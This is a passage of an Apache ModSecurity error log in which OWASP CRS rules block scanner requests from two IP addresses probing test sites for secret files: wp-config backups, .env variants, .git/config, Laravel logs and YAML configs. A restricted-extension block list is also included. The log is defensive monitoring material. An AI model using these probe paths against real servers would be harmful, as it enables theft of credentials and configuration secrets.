"economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSeV3YxHByoaNs3XDjf6fwAAAAc"]
[Thu Nov 27 01:05:49.885814 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSeV3YxHByoaNs3XDjf6fwAAAAc"]
[Thu Nov 27 01:05:49.886041 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSeV3YxHByoaNs3XDjf6fwAAAAc"]
[Thu Nov 27 01:05:49.886241 2025] [:error] [pid 351651] [client 195.178.110.157:53888] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-config.php.bak"] [unique_id "aSeV3YxHByoaNs3XDjf6fwAAAAc"]
[Thu Nov 27 01:06:14.914174 2025] [:error] [pid 351272] [client 195.178.110.157:39702] [client 195.178.110.157] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".log"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aSeV9pES3tECXuZM229rKwAAAAQ"]
[Thu Nov 27 01:06:14.914530 2025] [:error] [pid 351272] [client 195.178.110.157:39702] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aSeV9pES3tECXuZM229rKwAAAAQ"]
[Thu Nov 27 01:06:14.914723 2025] [:error] [pid 351272] [client 195.178.110.157:39702] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/storage/logs/laravel.log"] [unique_id "aSeV9pES3tECXuZM229rKwAAAAQ"]
[Thu Nov 27 01:06:53.078767 2025] [authz_core:error] [pid 350836] [client 195.178.110.157:59322] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/config
[Thu Nov 27 01:06:53.853516 2025] [:error] [pid 350836] [client 195.178.110.157:59322] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/config/parameters.yml"] [unique_id "aSeWHaWtpwlEodVKjNruGQAAAAI"]
[Thu Nov 27 01:06:53.853971 2025] [:error] [pid 350836] [client 195.178.110.157:59322] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/config/parameters.yml"] [unique_id "aSeWHaWtpwlEodVKjNruGQAAAAI"]
[Thu Nov 27 01:06:53.854244 2025] [:error] [pid 350836] [client 195.178.110.157:59322] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/config/parameters.yml"] [unique_id "aSeWHaWtpwlEodVKjNruGQAAAAI"]
[Thu Nov 27 01:07:00.506634 2025] [:error] [pid 350838] [client 195.178.110.157:59284] [client 195.178.110.157] ModSecurity: Warning. Matched phrase "/config/config.yml" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/config.yml found within REQUEST_FILENAME: /api/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/api/config/config.yml"] [unique_id "aSeWJFloYoeK3vI2n0LLMQAAAAg"]
[Thu Nov 27 01:07:00.506968 2025] [:error] [pid 350838] [client 195.178.110.157:59284] [client 195.178.110.157] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/api/config/config.yml"] [unique_id "aSeWJFloYoeK3vI2n0LLMQAAAAg"]
[Thu Nov 27 01:07:00.507196 2025] [:error] [pid 350838] [client 195.178.110.157:59284] [client 195.178.110.157] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/api/config/config.yml"] [unique_id "aSeWJFloYoeK3vI2n0LLMQAAAAg"]
[Thu Nov 27 08:08:45.799840 2025] [:error] [pid 353188] [client 52.59.210.188:55314] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSf4_T4fHjXDucK3GWvWawAAAAQ"]
[Thu Nov 27 08:08:45.800224 2025] [:error] [pid 353188] [client 52.59.210.188:55314] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSf4_T4fHjXDucK3GWvWawAAAAQ"]
[Thu Nov 27 08:08:45.800432 2025] [:error] [pid 353188] [client 52.59.210.188:55314] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "aSf4_T4fHjXDucK3GWvWawAAAAQ"]
[Thu Nov 27 08:08:45.868743 2025] [:error] [pid 353184] [client 52.59.210.188:55336] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSf4_YG5PbbCKE0XPKZggQAAAAA"]
[Thu Nov 27 08:08:45.868984 2025] [:error] [pid 353184] [client 52.59.210.188:55336] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSf4_YG5PbbCKE0XPKZggQAAAAA"]
[Thu Nov 27 08:08:45.869181 2025] [:error] [pid 353184] [client 52.59.210.188:55336] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "aSf4_YG5PbbCKE0XPKZggQAAAAA"]
[Thu Nov 27 08:08:45.940773 2025] [:error] [pid 353185] [client 52.59.210.188:55368] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSf4_XTG8IrOxOxezX5AVQAAAAE"]
[Thu Nov 27 08:08:45.940995 2025] [:error] [pid 353185] [client 52.59.210.188:55368] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSf4_XTG8IrOxOxezX5AVQAAAAE"]
[Thu Nov 27 08:08:45.941190 2025] [:error] [pid 353185] [client 52.59.210.188:55368] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aSf4_XTG8IrOxOxezX5AVQAAAAE"]
[Thu Nov 27 08:08:46.021891 2025] [:error] [pid 354740] [client 52.59.210.188:55390] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSf4_iz_tey498iHQ9agBwAAAAc"]
[Thu Nov 27 08:08:46.022140 2025] [:error] [pid 354740] [client 52.59.210.188:55390] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSf4_iz_tey498iHQ9agBwAAAAc"]
[Thu Nov 27 08:08:46.022334 2025] [:error] [pid 354740] [client 52.59.210.188:55390] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.remote"] [unique_id "aSf4_iz_tey498iHQ9agBwAAAAc"]
[Thu Nov 27 08:08:46.095606 2025] [:error] [pid 354739] [client 52.59.210.188:55414] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSf4_u_UStX-GTeIAe_uqQAAAAY"]
[Thu Nov 27 08:08:46.095854 2025] [:error] [pid 354739] [client 52.59.210.188:55414] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSf4_u_UStX-GTeIAe_uqQAAAAY"]
[Thu Nov 27 08:08:46.096055 2025] [:error] [pid 354739] [client 52.59.210.188:55414] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aSf4_u_UStX-GTeIAe_uqQAAAAY"]
[Thu Nov 27 08:08:46.163888 2025] [authz_core:error] [pid 354741] [client 52.59.210.188:55442] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.env
[Thu Nov 27 08:08:46.234591 2025] [authz_core:error] [pid 353187] [client 52.59.210.188:55460] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/lib/.env
[Thu Nov 27 08:08:46.330626 2025] [:error] [pid 354737] [client 52.59.210.188:55498] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /lab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSf4_neYAxY_xo8wsP-UdQAAAAU"]
[Thu Nov 27 08:08:46.330863 2025] [:error] [pid 354737] [client 52.59.210.188:55498] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSf4_neYAxY_xo8wsP-UdQAAAAU"]
[Thu Nov 27 08:08:46.331056 2025] [:error] [pid 354737] [client 52.59.210.188:55498] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/lab/.env"] [unique_id "aSf4_neYAxY_xo8wsP-UdQAAAAU"]
[Thu Nov 27 08:08:46.400834 2025] [:error] [pid 353186] [client 52.59.210.188:55522] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cronlab/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSf4_iOJA5NFmjDGU5hICQAAAAI"]
[Thu Nov 27 08:08:46.401064 2025] [:error] [pid 353186] [client 52.59.210.188:55522] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSf4_iOJA5NFmjDGU5hICQAAAAI"]
[Thu Nov 27 08:08:46.401248 2025] [:error] [pid 353186] [client 52.59.210.188:55522] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cronlab/.env"] [unique_id "aSf4_iOJA5NFmjDGU5hICQAAAAI"]
[Thu Nov 27 08:08:46.469793 2025] [:error] [pid 353188] [client 52.59.210.188:55544] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSf4_j4fHjXDucK3GWvWbAAAAAQ"]
[Thu Nov 27 08:08:46.470028 2025] [:error] [pid 353188] [client 52.59.210.188:55544] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSf4_j4fHjXDucK3GWvWbAAAAAQ"]
[Thu Nov 27 08:08:46.470300 2025] [:error] [pid 353188] [client 52.59.210.188:55544] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aSf4_j4fHjXDucK3GWvWbAAAAAQ"]
[Thu Nov 27 08:08:46.546562 2025] [:error] [pid 353184] [client 52.59.210.188:55576] [client 52.59.210.188] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSf4_oG5PbbCKE0XPKZgggAAAAA"]
[Thu Nov 27 08:08:46.546779 2025] [:error] [pid 353184] [client 52.59.210.188:55576] [client 52.59.210.188] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSf4_oG5PbbCKE0XPKZgggAAAAA"]
[Thu Nov 27 08:08:46.546953 2025] [:error] [pid 353184] [client 52.59.210.188:55576] [client 52.59.210.188] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aSf4_oG5PbbCKE0XPKZgggAAAAA"]
